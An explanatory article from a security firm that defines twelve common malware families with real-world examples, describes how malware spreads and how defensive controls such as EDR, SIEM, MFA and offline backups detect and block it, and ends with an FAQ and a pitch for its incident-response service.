Types of Malware: Definition, Real Examples and Detection

Malware is any software designed to perform unauthorised actions on a computer system without the owner's consent: steal data, encrypt files, spy on users, maintain persistent access or turn the machine into part of a larger criminal infrastructure. The term covers very different families (a virus, ransomware and an infostealer are all malware, but they behave, spread and get detected very differently). Knowing the types isn't academia: it changes which controls a security team applies and how it prioritises the response when an alert fires.

This piece explains what malware is, how it works, walks through the 12 families any defensive team meets in production today and how they get detected and blocked in practice.

What malware is

Malware is a program or piece of code whose goal is to operate against the interests of the user or the organisation owning the system. That intent is the line separating malware from legitimate software: a commercial keylogger used by a parent with a minor's consent isn't malware; the same binary stealthily installed on an employee's laptop is.

What malware actually does depends on the attacker's goal. The most common functions:

• Steal credentials, session cookies or personal data and send them to a server controlled by the attacker.
• Encrypt files and demand ransom (ransomware).
• Maintain persistent remote access to the machine (RAT, backdoor, rootkit).
• Turn the machine into a bot joining a botnet to attack other targets (DDoS, spam, crypto mining).
• Spy on the user: capture keystrokes, microphone, camera, location or screen.
• Sabotage the system: delete data, manipulate industrial processes (SCADA), corrupt backups.

The term "virus" became popular in the 1980s and many still use it as a synonym for malware. Technically a virus is just one specific type. It's worth keeping the distinction if your work involves incidents, because the response runbook changes a lot per family.

How malware spreads

Almost every malware incident starts with one of these vectors:

• Phishing with attachment or link. A seemingly legitimate email inviting you to open a PDF, a Word with macros or a URL that downloads the binary. Still vector number one.
• Drive-by download. The victim visits a compromised site and an exploit kit leverages a browser vulnerability to execute code without interaction.
• Unpatched exposed systems. RDP services open to the Internet, VPNs with public CVEs, admin panels without MFA. Ransomware like Royal or BlackCat got in this way during 2024-2025.
• Supply chain. An npm package, PyPI library or a binary signed by a legitimate vendor that gets compromised. SolarWinds, 3CX and XZ Utils are the famous cases.
• Malicious USB. Rarer in enterprise, frequent in OT sectors and restricted environments.
• Mobile apps installed from third-party stores (Android) or via MDM profile on iOS.

Types of malware: the 12 families every defensive team meets

The most relevant families below, with operational definition, real example and key difference from similar families.

Virus

A virus is malware that inserts itself into legitimate files (executables, macro-enabled documents) and needs the user to open them to activate and propagate. Every executed copy infects new files.

Today it's a minority category in enterprise because the antivirus tools of the 1990s were designed precisely against it and signed executables, ASLR/DEP and macro scanners left it marginal. Still present in Office macros and some families targeting legacy systems.

Worm

A worm self-propagates over the network without needing user interaction. It exploits vulnerabilities in exposed services to hop from one machine to another.

Historical example: WannaCry (2017) used EternalBlue against SMBv1 to spread to 200,000 machines in hours. Recent example: Mirai and its variants infect IoT devices with default credentials and build botnets of hundreds of thousands of cameras and routers.

Trojan

A trojan disguises itself as legitimate software. The user installs it convinced it's a useful tool (a cracked installer, an alleged patch, a "invoice" PDF) and the binary executes malicious functions in parallel.

Operational example: Emotet started as a banking trojan and evolved into a distribution platform for other families (TrickBot, Ryuk, Conti). European police takedowns in 2021 and 2022 reduced it, but Lumma Stealer and others have filled its niche.

Ransomware

Ransomware encrypts files on the machine or network and demands ransom (usually in cryptocurrency) in exchange for the decryption key. Modern variants combine encryption with double extortion: they exfiltrate the data before encrypting and threaten to publish it if no payment is made.

Active families in 2025-2026: LockBit (versions 4.0 and derivatives after Operation Cronos), BlackCat/ALPHV (partly dismantled but with re-brands), Royal, Akira, Play. Most operate under the Ransomware-as-a-Service (RaaS) model with affiliates receiving a percentage of the ransom.

Regulatory fines for poor incident handling (GDPR, NIS2) often exceed the ransom itself when ransomware affects personal data.

Spyware

Spyware gathers user information without consent: browsing habits, typed credentials, screenshots, location, microphone audio. The difference with an infostealer is persistence: spyware monitors for weeks or months; an infostealer takes whatever it finds in one pass and leaves.

Government example: Pegasus (NSO Group) used against journalists and activists. In private enterprise, spyware mostly appears as a module embedded in trojans or RATs. The neighbouring but distinct category is adware, which monetises through advertising and doesn't necessarily collect credentials.

Adware

Adware is software that displays unsolicited ads or redirects browsing traffic to attacker-affiliated sites. Historically annoying more than dangerous, but recent variants collect browsing data and open the door to other payloads.

Usually arrives bundled in poorly moderated freeware installers.

Rootkit

A rootkit modifies operating system components (kernel, drivers, bootloader) to hide its presence and that of any other malware riding along. Detection requires inspection at kernel or boot level, not just filesystem analysis.

Types: userland rootkits (modify libraries and processes in user space), kernel rootkits (load a module into the kernel), bootkits/UEFI rootkits (infect firmware or bootloader and survive OS reinstalls).

Recent case: BlackLotus (UEFI bootkit detected in 2023-2024) signed with a valid key that bypassed Secure Boot on unpatched Windows versions.

Keylogger

A keylogger captures everything the user types: passwords, messages, searches. Can be hardware (rare in enterprise) or software, and usually arrives as a module of a trojan or RAT rather than as a standalone binary.

Botnet

A botnet is a network of compromised machines coordinated by a C2 (command and control) server. Each individual machine runs a bot client. The botnet gets rented by the hour for DDoS, spam, ad fraud or as an entry point for other intrusions.

Relevant families: Emotet (delivery botnet), Mirai and derivatives (IoT), Necurs (historic spam), TrickBot (banking, now legacy).

Infostealer

An infostealer is a trojan specialised in stealing saved credentials, session cookies, crypto wallets, application tokens and sensitive files from the machine. Once it extracts the loot, it uninstalls itself.

It's the category with the highest growth in 2024-2026. Dominant families: Lumma Stealer, Redline, Vidar, StealC, Raccoon. The stolen logs get sold in marketplaces as initial access for ransomware: someone buys SSO session cookies of an employee, gets into the VPN or SaaS and sells that access to a ransomware group.

RAT (Remote Access Trojan)

A RAT gives the attacker interactive remote control of the machine: execute commands, transfer files, open webcam, watch the screen, pivot to other machines. Favourite tool of APT actors and espionage operations.

Classic families: Cobalt Strike (commercial pentesting tool massively abused), Sliver (open source, growing replacement), Quasar, NjRAT, AsyncRAT.

Fileless malware

Fileless malware runs code directly in memory without writing a binary to disk. It lives in legitimate system processes (PowerShell, WMI, regsvr32, mshta) and abuses native Windows utilities ("LOLBins": Living Off the Land Binaries).

Methodological example: a Cobalt Strike beacon injected into a legitimate process via a Word macro. With no file on disk, traditional signature AV doesn't detect it. Detection requires EDR and behavioural telemetry.

Dropper / loader

A dropper or loader is a small payload whose only job is to download and install the "real" malware. Useful to evade static detection (the dropper itself looks innocuous) and to modulate the load (the attacker decides at runtime what to deploy depending on the victim).

SmokeLoader, GuLoader and IcedID are frequent loaders in mass campaigns. After the loader phase, the attacker decides whether the victim is worth ransomware, infostealer or extended RAT.

How the different types get detected and blocked

There's no single control that covers every family. Reasonable defence combines:

• Antivirus / EPP with signatures and ML for viruses, classic worms and known droppers. Enough for background noise, insufficient for almost everything else.
• EDR with behavioural telemetry to detect fileless, RATs, infostealers and lateral movement. The piece that most reduces attacker dwell time.
• SIEM correlating endpoint, network, identity and cloud telemetry. Detects chains that endpoint alone doesn't see.
• Email security with sandbox to detonate suspicious attachments before delivering the email. Stops a large share of phishing with attached malware.
• MFA on everything SaaS or VPN. Cancels the value of cookies and credentials stolen by infostealers. Only measure that breaks the criminal log marketplace chain.
• Aggressive patch management on exposed surface: VPN, RDP, admin panels, legacy systems. Public CVE exploitation remains the second vector after phishing.
• Network segmentation so a compromised machine doesn't end up owning the whole domain. Especially critical in industry with OT.
• Offline tested backups. The only reliable defensive response to ransomware is restoring from a clean backup.

Common mistakes in malware management

Four frequent patterns that appear in incident response reports:

1. Trusting only traditional antivirus. Covers viruses and classic worms, leaves out fileless, modern infostealers and stealthy RATs. The behavioural detection EDR provides is no longer optional.
2. Not segmenting the network. A machine with malware becomes an organisation-wide compromise if all servers are reachable. Segmentation reduces the incident's blast radius.
3. Not drilling the ransomware playbook. The first ransomware isn't the moment to improvise communications, payment decisions and restoration. The annual tabletop with real scenarios is what separates a hours-long containment from a weeks-long one.
4. Assuming MFA is enough. MFA stops password theft, but modern infostealers steal post-MFA session cookies. Token binding, short sessions and active review of unusual sessions are the next controls.

Frequently asked questions

What's the difference between virus and malware?

Malware is the general term: any software designed to do harm. A virus is a specific malware category that inserts itself into files and needs the user to open them to spread. Today most enterprise incidents aren't viruses in the strict sense but trojans, ransomware, infostealers and RATs.

Which type of malware is most dangerous for a company?

It depends on the business model. For most companies, ransomware is the highest immediate impact risk (paralyses operations). For sectors with sensitive intellectual property or massive personal data, infostealers and APT RATs are more dangerous because of silent exfiltration that takes months to detect. The incidents that end worst combine both: an infostealer steals an employee's cookies, the attacker enters the SSO, moves laterally for several weeks and fires ransomware at the end.

How does malware typically enter a company?

Three paths concentrate most incidents: phishing with attachment or link, exploitation of unpatched exposed services (VPN, RDP, admin panels) and supply chain compromise (SaaS provider, code package, signed binary). Phishing remains vector number one in annual reports from ENISA, IBM and Verizon DBIR.

Does antivirus still work in 2026?

Yes, as a base layer. Detects background noise (known variants, common droppers, classic viruses) and frees the security team from having to look at every alert. What's no longer enough is trusting the endpoint only to antivirus: modern families (fileless, RATs, daily-updated infostealers) require EDR with behavioural telemetry.

What do I do if I suspect a machine has malware?

Isolate the machine from the network without powering it off (powering off destroys volatile evidence), notify the security team or a DFIR provider, and don't manipulate the system beyond what's necessary to contain. If there's no internal team, contact an incident response service immediately and, in Spain, file a report with INCIBE-CERT if you're an entity under NIS2.

How do you specifically prevent ransomware?

Four controls cover most of the risk: MFA on VPN, RDP and SaaS to cut initial access; aggressive patching of services exposed to the Internet; EDR with automated response to halt encryption in an early phase; and offline backups (not accessible from the domain) tested with real restoration at least quarterly.

Related resources

• What is a SOC: the team and processes that monitor and respond to malware alerts in production.
• What is SIEM: the platform that correlates endpoint, network and identity telemetry to detect attack chains.
• What is EDR: the endpoint piece that detects fileless, RATs and infostealers the traditional antivirus doesn't see.
• What is a CVE: the identifiers of the vulnerabilities many malware families exploit to get in.
• What is pentesting: how pentesting validates that anti-malware controls hold against a real attacker.

Malware response at Secra

At Secra we help organisations contain ongoing malware incidents (DFIR) and reinforce defensive posture to reduce the probability of it happening again (technical audit, internal SOC improvement, EDR/SIEM integration). If your team is managing an active incident or wants to prepare the playbook before the first one, get in touch via contact or check our incident response service.